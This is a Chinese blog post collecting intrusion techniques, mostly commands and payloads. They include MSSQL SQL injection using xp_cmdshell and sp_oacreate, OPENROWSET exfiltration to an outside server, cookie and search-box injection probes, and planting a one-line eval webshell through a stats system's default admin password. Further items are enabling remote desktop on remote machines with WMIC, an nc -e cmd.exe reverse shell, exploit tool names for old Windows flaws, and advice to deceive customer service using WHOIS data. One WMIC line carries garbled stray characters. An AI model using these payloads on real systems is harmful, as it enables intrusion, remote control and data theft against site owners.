注入技巧收集

SA点数据库分离技术相关




SA点数据库分离搞法+语句:


注射点不显错,执行下面三条语句页面都返回正常。
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
可以列目录,判断系统为2000,web与数据库分离
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
在注射点上执行
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
还有我用NC监听得其他端口都没有得到IP。


通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--


;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--


现在就猜想是不是数据库是内网而且不能连外网。




access导出txt文本代码
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin






自动跳转到指定网站代码头
<body οnlοad='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>




入侵java or jsp站点时默认配置文件路径:
\web-inf\web.xml
tomcat下的配置文件位置:
\conf\server.xml            (前面加上tomcat路径)
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml






检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
-1%23

<
1'+or+'1'='1
id=8%bf


全新注入点检测试法:
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。


在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。


搜索型注入判断方法:
北京%' and '1'='1' and '%'='
北京%' and '1'='2' and '%'='




COOKIES注入:


javascript:alert(document.cookie="id="+escape("51 and 1=1"));


2000专业版查看本地登录用户命令:
net config workstation




2003下查看ipsec配置和默认防火墙配置命令:
netsh firewall show config
netsh ipsec static show all


不指派指定策略命令:
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
netsh ipsec static show policy all  显示策略名




猜管理员后台小技巧:
admin/left.asp 
admin/main.asp
admin/top.asp
admin/admin.asp 
会现出菜单导航,然后迅雷下载全部链接




社会工程学:
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
然后去骗客服




统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。






6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)






CMD加密注册表位置
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
AutoRun


(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
AutoRun




在找注入时搜索Hidden,把他改成test






mstsc /v:IP /console 




一句话开3389:


最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,


wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
开远程:
WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1         
 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.




知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
Insert into admin(user,pwd) values('test','test')




NC反弹
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)




在脚本入侵过程中要经常常试用%00来确认下参数是否有问题


有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
例如:
subst k: d:\www\ 用d盘www目录替代k盘
subst k: /d  解除K盘代替
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

季海晨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值